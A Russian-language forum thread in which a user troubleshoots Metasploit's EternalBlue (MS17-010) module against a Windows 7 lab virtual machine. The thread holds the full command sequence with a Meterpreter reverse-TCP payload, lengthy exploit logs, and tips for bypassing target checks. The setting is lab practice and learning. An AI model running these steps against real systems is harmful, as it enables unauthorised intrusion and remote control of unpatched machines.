• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Не могу использовать ms17_010_eternalblue в Metasploit

DGDays

Active member
26.01.2021
28
0
BIT
0
Добрый день!
Нашёл такой . В нём используется ms17_010_eternalblue, но мне не удаётся его использовать. Пишет про неизвестную ошибку.

Команды:

Bash:
use auxiliary/scanner/smb/smb_ms07_010
show options
set RHOSTS <IP Address>
run
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS <client IP Address>
show payloads
set payloads windows/x64/meterpreter/reverse_tcp
set LHOST <your IP Address>
exploit

Ошибка:
Bash:
[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.1:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.1:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.122.1:445     - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.122.1:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

Помогите, пожалуйста, решить проблему.


Атакую с Kali Linux, жертва - виртуалка с Win7
 

Cosiano

New member
01.08.2017
1
0
BIT
4
То что ты на виртуальной машине пробуешь(скорее всего )это понятно , ОS которую ты поставил на виртуху возможно уже пропачина, и для полноценного проникновения хотя бы антивирь у неё выключи и контроля учетных записей в windows на минимум выкрути тогда должно всё сработать..... если патч не стоит и проверь эту ОS утилиткой EternalBlues
 
Последнее редактирование:

DGDays

Active member
26.01.2021
28
0
BIT
0
То что ты на виртуальной машине пробуешь(скорее всего )это понятно , ОS которую ты поставил на виртуху возможно уже пропачина, и для полноценного проникновения хотя бы антивирь у неё выключи и контроля учетных записей в windows на минимум выкрути тогда должно всё сработать..... если патч не стоит и проверь эту ОS утилиткой EternalBlues
Ну, я пробовал ещё свою вторую тачку взломать(винда 10), но, как я понял, там уже устранили эту уязвимость. Брандмауэр полностью отключил, а антивиря нет. Качал полностью голую Винду 7. Утилиткой, обязательно, проверю. Если возникнут вопросы - ещё напишу ;)
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
Ну, я пробовал ещё свою вторую тачку взломать(винда 10), но, как я понял, там уже устранили эту уязвимость. Брандмауэр полностью отключил, а антивиря нет. Качал полностью голую Винду 7. Утилиткой, обязательно, проверю. Если возникнут вопросы - ещё напишу ;)
Перепроверь точно х86 или х64. Это играет большую роль
 

DGDays

Active member
26.01.2021
28
0
BIT
0
То что ты на виртуальной машине пробуешь(скорее всего )это понятно , ОS которую ты поставил на виртуху возможно уже пропачина, и для полноценного проникновения хотя бы антивирь у неё выключи и контроля учетных записей в windows на минимум выкрути тогда должно всё сработать..... если патч не стоит и проверь эту ОS утилиткой EternalBlues
СПАСИБО БОЛЬШОЕ ЗА ПОДСКАЗКУ!!!! Выяснил, что виртуалка находится под другим ip. Чуточку сам ошибся, но теперь знаю как можно быстро проверить ПК на уязвимость) Ещё раз спасибо!!!!
 

DGDays

Active member
26.01.2021
28
0
BIT
0
УОУОУОУ!!! Подключиться всё равно не вышло XD

Пишет такую ошибку:

Bash:
[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.1:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.1:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.122.1:445     - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.122.1:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.122.167
RHOSTS => 192.168.122.167
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.167:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.122.167:445 - The target is vulnerable.
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
УОУОУОУ!!! Подключиться всё равно не вышло XD

Пишет такую ошибку:

Bash:
[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.1:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.1:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.122.1:445     - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.122.1:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.122.167
RHOSTS => 192.168.122.167
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.167:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.122.167:445 - The target is vulnerable.
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1    
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1    
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1    
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
У меня иногда такое бывало, банально перезапуск МСФ помогал. Сначала пройди AUX'ом, а потом уже експлоит запускай. Что бы правильно еще виртуалку определять, сканируй нмапом сеть, если ты симулируешь проникновение. Либо через ipconfig в виртуалке сверяй. Еще перепроверь в каком типе сетей твоя VM эмулирует сетевое соеденение
 

DGDays

Active member
26.01.2021
28
0
BIT
0
У меня иногда такое бывало, банально перезапуск МСФ помогал. Сначала пройди AUX'ом, а потом уже експлоит запускай. Что бы правильно еще виртуалку определять, сканируй нмапом сеть, если ты симулируешь проникновение. Либо через ipconfig в виртуалке сверяй. Еще перепроверь в каком типе сетей твоя VM эмулирует сетевое соеденение
К сожалению, перезапуск МСФ не помог. Также перезапускал винду и атакающую машину. Проблема не исчезла...
 

DGDays

Active member
26.01.2021
28
0
BIT
0
Дай скрин сканера с мсф который сканирует под етернал блю
1615375831521.png


Вот текстовый вывод:
Bash:
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4

DGDays

Active member
26.01.2021
28
0
BIT
0
Скинь скрин опций эксплоита
Show options команда
Bash:
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.122.167  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.122    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
Bash:
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.122.167  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.122    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
Set verify_arch 0
Set verify_target 0

И странно что у машин разные подсети. Перепроверь свою машину. Почему у цели 122.167 а у твоей 1.122
Можешь проставить 0.0.0.0
И это ты пейлоад метерпретер добовляешь к експлойту. Попробуй без него
Unset payload
 

DGDays

Active member
26.01.2021
28
0
BIT
0
Set verify_arch 0
Set verify_target 0

И странно что у машин разные подсети. Перепроверь свою машину. Почему у цели 122.167 а у твоей 1.122
Можешь проставить 0.0.0.0
И это ты пейлоад метерпретер добовляешь к експлойту. Попробуй без него
Unset payload
Хорошо, попробую без него. К сожалению, попробовать смогу только через час.

Дело в том, что пробую метасплоит на виртуалке, а qemu и virt создали фэйковую сетевую карту, к которой и подключается виртуалка. А так как основная карта заканчивается на 122, то ip у виртуалки 192.168.122.xxx
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
Хорошо, попробую без него. К сожалению, попробовать смогу только через час.

Дело в том, что пробую метасплоит на виртуалке, а qemu и virt создали фэйковую сетевую карту, к которой и подключается виртуалка. А так как основная карта заканчивается на 122, то ip у виртуалки 192.168.122.xxx
Ну как попробуете - пиши,попробую помочь разобраться с проблемой. Так же советую ставить oracle virtualbox. Лично для меня очень проста в настройке и не требует танцев с бубном.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!